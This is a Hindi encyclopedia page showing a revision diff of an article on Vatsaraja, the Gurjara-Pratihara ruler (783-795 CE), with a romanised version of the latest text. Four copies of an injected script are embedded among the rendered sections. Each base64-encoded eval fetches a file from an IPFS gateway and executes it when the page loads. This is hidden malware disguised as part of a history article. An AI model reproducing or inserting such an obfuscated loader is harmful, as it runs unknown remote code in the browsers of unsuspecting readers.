Difference between revisions of "वत्सराज"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
Line 1: Line 1:
'''वत्सराज''' सम्राट की उपाधी धारण करने वाला [[गुर्जर प्रतिहार वंश]] का पहला शासक था। इसे प्रतिहार साम्राज्य का वास्तविक संस्थापक कहा जाता है।
+
'''वत्सराज''' राष्ट्रकूट नरेश [[ध्रुव धारावर्ष]] का समकालीन था। वह 'सम्राट' की उपाधी धारण करने वाला [[गुर्जर प्रतिहार वंश]] का पहला शासक था। इसे प्रतिहार साम्राज्य का वास्तविक संस्थापक कहा जाता है।
*[[नागभट्ट प्रथम]] के दो भतीजे 'कक्कुक' एवं 'देवराज' के शासन के बाद 'देवराज' का पुत्र '''वत्सराज''' (783 - 795 ई.) गद्दी पर बैठा।
+
 
 +
*[[नागभट्ट प्रथम]] के दो भतीजे 'कक्कुक' एवं 'देवराज' के शासन के बाद देवराज का पुत्र वत्सराज (783-795 ई.) गद्दी पर बैठा।
 
*वत्सराज के समय में ही [[कन्नौज]] के स्वामित्व के लिए त्रिदलीय संघर्ष आरम्भ हुआ।
 
*वत्सराज के समय में ही [[कन्नौज]] के स्वामित्व के लिए त्रिदलीय संघर्ष आरम्भ हुआ।
*उसने [[राजस्थान]] के मध्य भाग एवं उत्तर [[भारत]] के पूर्वी भाग को जीत कर अपने राज्य में मिलाया।
+
*[[राजस्थान]] के मध्य भाग एवं [[उत्तर भारत]] के पूर्वी भाग को जीतकर वत्सराज ने अपने राज्य में मिला लिया।
*उसने [[पाल वंश]] के शासक [[धर्मपाल]] को भी पराजित किया, पर वह [[राष्ट्रकूट वंश|राष्ट्रकूट]] नरेश [[ध्रुव]] से पराजित हुआ।
+
*उसने [[पाल वंश]] के शासक [[धर्मपाल]] को भी पराजित किया, पर वह [[राष्ट्रकूट वंश|राष्ट्रकूट]] नरेश [[ध्रुव धारावर्ष|ध्रुव]] से पराजित हुआ।
  
{{प्रचार}}
 
{{लेख प्रगति
 
|आधार=
 
|प्रारम्भिक=प्रारम्भिक1
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
  
 +
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक=|पूर्णता=|शोध=}}
 
==संबंधित लेख==
 
==संबंधित लेख==
{{मध्य काल}}
+
{{मध्य काल}}{{प्रतिहार साम्राज्य}}
{{प्रतिहार साम्राज्य}}
+
[[Category:इतिहास कोश]][[Category:मध्य काल]][[Category:प्रतिहार साम्राज्य]]
[[Category:इतिहास कोश]]
 
[[Category:मध्य काल]]
 
[[Category:प्रतिहार साम्राज्य]]
 
 
__INDEX__
 
__INDEX__

Latest revision as of 08:20, 14 July 2016

vatsaraj rashtrakoot naresh dhruv dharavarsh ka samakalin tha. vah 'samrat' ki upadhi dharan karane vala gurjar pratihar vansh ka pahala shasak tha. ise pratihar samrajy ka vastavik sansthapak kaha jata hai.

  • nagabhatt pratham ke do bhatije 'kakkuk' evan 'devaraj' ke shasan ke bad devaraj ka putr vatsaraj (783-795 ee.) gaddi par baitha.
  • vatsaraj ke samay mean hi kannauj ke svamitv ke lie tridaliy sangharsh arambh hua.
  • rajasthan ke madhy bhag evan uttar bharat ke poorvi bhag ko jitakar vatsaraj ne apane rajy mean mila liya.
  • usane pal vansh ke shasak dharmapal ko bhi parajit kiya, par vah rashtrakoot naresh dhruv se parajit hua.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>